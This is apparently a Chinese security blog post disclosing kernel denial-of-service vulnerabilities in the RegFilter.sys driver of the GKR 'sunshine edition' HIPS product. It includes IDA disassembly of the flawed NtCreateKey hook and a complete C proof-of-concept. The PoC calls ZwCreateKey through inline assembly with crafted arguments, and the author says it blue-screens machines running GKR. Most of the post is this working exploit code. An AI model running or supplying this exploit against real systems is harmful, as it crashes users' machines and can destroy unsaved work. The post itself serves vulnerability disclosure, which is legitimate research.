您的位置:首页 > 其它

GKR阳光版 RegFilter.sys<=2.0.00 多处内核拒绝服务漏洞

2012-05-29 10:32 495 查看
今天实在是无聊了,看到卡饭有个HIPS 叫GKR阳光版,正在做活动,还比较火,于是下载下来看之。发现有不少的内核拒绝服务漏洞。

受影响的版本号:



驱动:RegFilter.sys

示例函数:NtCreateKey

偏移:5076

IDA汇编代码如下:
PAGE:000150A0                 mov     ebx, [ebp+10h]
PAGE:000150A3                 cmp     ebx, edi ;一上来就来if(xxx){},实在无语
PAGE:000150A5                 jz      short loc_15112
PAGE:000150A7                 mov     ecx, [ebx+4]
PAGE:000150AA                 mov     [ebp-20h], ecx
PAGE:000150AD                 cmp     al, 1
PAGE:000150AF                 jnz     short loc_15100
PAGE:000150B1                 push    4
PAGE:000150B3                 push    18h
PAGE:000150B5                 push    ebx
PAGE:000150B6                 mov     esi, ds:ProbeForRead
PAGE:000150BC                 call    esi ; ProbeForRead 
PAGE:000150BE                 mov     eax, [ebx+8]
PAGE:000150C1                 cmp     eax, edi
PAGE:000150C3                 jz      short loc_150EC
PAGE:000150C5                 mov     ecx, ds:MmUserProbeAddress 
PAGE:000150CB                 mov     edx, [ecx]
PAGE:000150CD                 cmp     eax, edx


测试代码:

/*
    作者:莫灰灰
    博客:http://blog.csdn.net/hu3167343
    描述:GKR阳光版内核拒绝服务漏洞测试程序
*/

#include "stdafx.h"
#include <windows.h>

int _tmain(int argc, _TCHAR* argv[])
{
    HMODULE hMod = LoadLibrary(L"ntdll.dll");
    
    if (hMod)
    {
        PVOID p = GetProcAddress(hMod, "ZwCreateKey");
        if (p)
        {
            __asm{
                push 0
                push 0
                push 0
                push 0
                push 0x80000000
                push 0
                push 0
                call p
            }
        }
    }

    return 0;
}


ps:

1.一上来就if(xxx ){}的,可以看下老V的文章:http://bbs.pediy.com/showthread.php?t=144611

2.运行测试程序,在装有GKR的机器上马上蓝屏重启。正常机器木有影响。

3.选择安全软件需谨慎,不然还不如不装。。。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航